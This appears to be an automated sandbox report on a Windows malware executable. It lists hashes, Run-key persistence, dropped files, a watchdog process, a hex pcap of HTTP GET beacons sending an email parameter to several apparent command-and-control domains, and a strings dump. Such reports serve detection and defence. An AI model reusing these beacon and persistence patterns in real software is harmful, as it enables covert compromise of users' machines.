Analysis Date2015-05-12 20:51:30

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: d6ae44bcc8b8b69d03ba4cb639260f13 sha1: 1565d215c53d7496b3709e84b14e04ac20c44347 size: 298496
Section.rdata md5: ea394742f85fe6d1f4c517445969616d sha1: 994815a2e26e4639f0857505e7117fae9e058a17 size: 34304 md5: 8c6186c88aeefddece8b8d232563f91e sha1: d1ab75f705d6094663f92374048f6aa52c2b41d4 size: 95232
Timestamp2014-10-30 10:06:20
PackerMicrosoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Accounts TP Hardware AuthIP Storage ➝
C:\Documents and Settings\Administrator\Application Data\ijfkdasmkjjmxh\nxherkr.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\ijfkdasmkjjmxh\nxherkr.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\ijfkdasmkjjmxh\nxherkr.exe

↳ C:\Documents and Settings\Administrator\Application Data\ijfkdasmkjjmxh\nxherkr.exe

Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\ijfkdasmkjjmxh\nxherkr.mmy
Creates FileC:\Documents and Settings\Administrator\Application Data\ijfkdasmkjjmxh\jikkpxkwvy.exe
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\ijfkdasmkjjmxh\nxherkr.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\ijfkdasmkjjmxh\nxherkr.exe"

Network Details:
Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝
Flows TCP192.168.1.1:1038 ➝
Flows TCP192.168.1.1:1039 ➝
Flows TCP192.168.1.1:1040 ➝
Flows TCP192.168.1.1:1041 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706e61 64796131 36407961   mail=pnadya16@ya
0x00000020 (00032)   686f6f2e 6672266d 6574686f 643d706f
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2065 6c656374 72696364   .Host: electricd
0x00000070 (00112)   65766963 652e6e65 740d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706e61 64796131 36407961   mail=pnadya16@ya
0x00000020 (00032)   686f6f2e 6672266d 6574686f 643d706f
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2074 72616465 73657474   .Host: tradesett
0x00000070 (00112)   6c652e6e 65740d0a 0d0a0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706e61 64796131 36407961   mail=pnadya16@ya
0x00000020 (00032)   686f6f2e 6672266d 6574686f 643d706f
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2073 74726565 74646576   .Host: streetdev
0x00000070 (00112)   6963652e 6e65740d 0a0d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706e61 64796131 36407961   mail=pnadya16@ya
0x00000020 (00032)   686f6f2e 6672266d 6574686f 643d706f
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2062 65747465 72646576   .Host: betterdev
0x00000070 (00112)   6963652e 6e65740d 0a0d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706e61 64796131 36407961   mail=pnadya16@ya
0x00000020 (00032)   686f6f2e 6672266d 6574686f 643d706f
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2066 6c696572 6265666f   .Host: flierbefo
0x00000070 (00112)   72652e6e 65740d0a 0d0a0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706e61 64796131 36407961   mail=pnadya16@ya
0x00000020 (00032)   686f6f2e 6672266d 6574686f 643d706f
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a206e 69676874 73707269   .Host: nightspri
0x00000070 (00112)   6e672e6e 65740d0a 0d0a0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706e61 64796131 36407961   mail=pnadya16@ya
0x00000020 (00032)   686f6f2e 6672266d 6574686f 643d706f
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2063 61707461 696e7375   .Host: captainsu
0x00000070 (00112)   63636573 732e6e65 740d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706e61 64796131 36407961   mail=pnadya16@ya
0x00000020 (00032)   686f6f2e 6672266d 6574686f 643d706f
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2065 6c656374 72696373   .Host: electrics
0x00000070 (00112)   7072696e 672e6e65 740d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706e61 64796131 36407961   mail=pnadya16@ya
0x00000020 (00032)   686f6f2e 6672266d 6574686f 643d706f
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2074 72616465 73707269   .Host: tradespri
0x00000070 (00112)   6e672e6e 65740d0a 0d0a0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706e61 64796131 36407961   mail=pnadya16@ya
0x00000020 (00032)   686f6f2e 6672266d 6574686f 643d706f
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2073 74726565 74737563   .Host: streetsuc
0x00000070 (00112)   63657373 2e6e6574 0d0a0d0a 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706e61 64796131 36407961   mail=pnadya16@ya
0x00000020 (00032)   686f6f2e 6672266d 6574686f 643d706f
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2073 74726565 7462616e   .Host: streetban
0x00000070 (00112)   6b65722e 6e65740d 0a0d0a0a 0a


         (((((                  H
         h((((                  H
An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
 Base Class Array'
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
invalid string position
isapcuhx pzpapunpe dsmoqp eisu iacjagup cishe ficlua vjg gvbacrm kls cubr rge jfmoeija nkea goscobrv ctsos fisbo fizwumlcub aidpgeeeq abnm mptagdv peoqgejzuv fva bacono bfe cgb cab fqx fjzipubu dapejeulwn gqleagmb tgdeimgn spotidpdo pviculc qkzirpz pfbumperu dbqezb dfdip znh gzvoognm otnen abqgopd gtvulhju abbvu fesyun vbnasdsurl dbwedspeou dmoesuoe dvs wegwu hewt jspamczevz dccass nonnininw gmab irmjimvpe fxji ugvaoxojw vodjabpzoz plmevcna ngmuwcsid nce bglebccui pxodu onrgig cvleml snaecuz mgma ospreqooos mywuaj drcalwhunp embbufca asljuefj ecwficf rcbei uzoc lcsuvpyopd nskau kcvizrgul osmjobjke rrrifdyuu cbyoomnfo mltitqguu pnbuhb pnfuhbto loxda frjeezmgol sets ibk bzbatbof uaupbuanel ffoineuee ruvl sosl qsv ejtroqhrog lftew evtouah fmnifdaui jmloebt nzpu figj cbpe wfhu xzfi belluo zifqaxfubu cbnar cnpubr dgs krfuxciwa urluguu fdteqso llmu fzzes ovkdun plm xsfaa spsa iaucv ddlougumn onnpu ompbejubic pmuj fspablja lsva lrci khnannelob bunbiolbj hdjoatuit cbbabn kxalic uraeufme rlnugc rgzakxosu tcgiy jbdi cft furoduzc bqm ilns lyopihuol pfamuaw ifvqedbj xmfij kdhiicpain ocpfusg znwijb drtaxsvaks smgoadizg dqfatrxa lgizeajg ccbapgik ckjogngo efrco odyput irsopeoje gmlavdt rfoole jomm ftselbgetj tnvascib dat jroa obrfeejdr cbjabqgi frtabujgap dbedup rwfupht fgruhaj zvnonqapa gdfem npkehjjo wbseqobu sismaph gioreku iey tnq ucdc vculuu buln aijvlo ywpaucagm wfdeaai namnepoc tedfeqag pgguep jqg fpup vbzappj gfjazc ecirlejk crcitm lssurarudi ttliylnusw ifabbabin bdhoclba sur ugghemate corpil orpbu bhgescifof zjoozobzg rfbiia scigifklah vngievme dcxap asnz sanciub dqxi jbfod groifujv gdxid boigfe drca ddru pobqillcil uzgeobumx qfow wck kis cnp ngmiejcq wojsu gxjo gjmien zcbouw ffz dvuawax ils lwumi wjbiek sjjufc scmupa fhogeucmiz lkre rnot tgbujcanuc brdeisgp okcfou otiei cwyir ndqepo jdpexsv amgbabojj wue pie srapamfbi aidcfoh pbpezvf vnj adgdel bjledc ngpovd
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
? pm>@e
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
+t HHt
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
< tK<	tG
TLOSS error
t$<"u	3
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
v	lsjD
v	N+D$
